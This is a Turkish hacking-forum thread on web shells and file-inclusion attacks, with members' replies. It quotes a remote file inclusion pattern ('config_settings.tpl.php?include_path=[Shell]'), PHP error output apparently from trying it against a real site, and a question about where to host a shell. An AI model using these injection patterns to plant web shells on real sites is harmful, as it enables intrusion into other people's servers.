Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |

NightWolf

Emektar
27 Ara 2005
722
11
about:home
Daha öncede sordu bi arkadaş ve cevapı verdim yazılan cevaplara baksan ii ıolur ama yinede açıklayım Shell backdoor olduğu için anti virüs programları virüs olarak algılıyor

CanTonA

Yeni üye
27 Haz 2007
3
0
arkadaşlar aynen yapıyorum ama böyle bi sayfa açılıyor denediklerimin hepsinde

Warning: main(/FastTemplate.php3) [function.main]: failed to open stream: No such file or directory in /home/rateourp/public_html/admin/config_settings.tpl.php on line 2

Warning: main() [function.include]: Failed opening '/FastTemplate.php3' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rateourp/public_html/admin/config_settings.tpl.php on line 2

Fatal error: Cannot instantiate non-existent class: fasttemplate in /home/rateourp/public_html/admin/config_settings.tpl.php on line 3

YENAL

Yeni üye
31 Ocak 2007
16
1
Bilgiler için gerçekten çok teşekkürler,çok açıklayıcı olmuş gerçekten =) Ama birşey soracağım bu açıkların hepsinin uzantısı böyle mi oluyor:

admin/config_settings.tpl.php?include_path=[Shell]

yani açıklar hep config_settings.tpl de mi oluyor??

1 Men's Army

Yeni üye
27 Tem 2007
4
0
s.a ustadim guzel anlatim benim bi sorum olacak
shell i hangi siteye upload edecegiz veya shell sitesini nerden bulabiliriz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.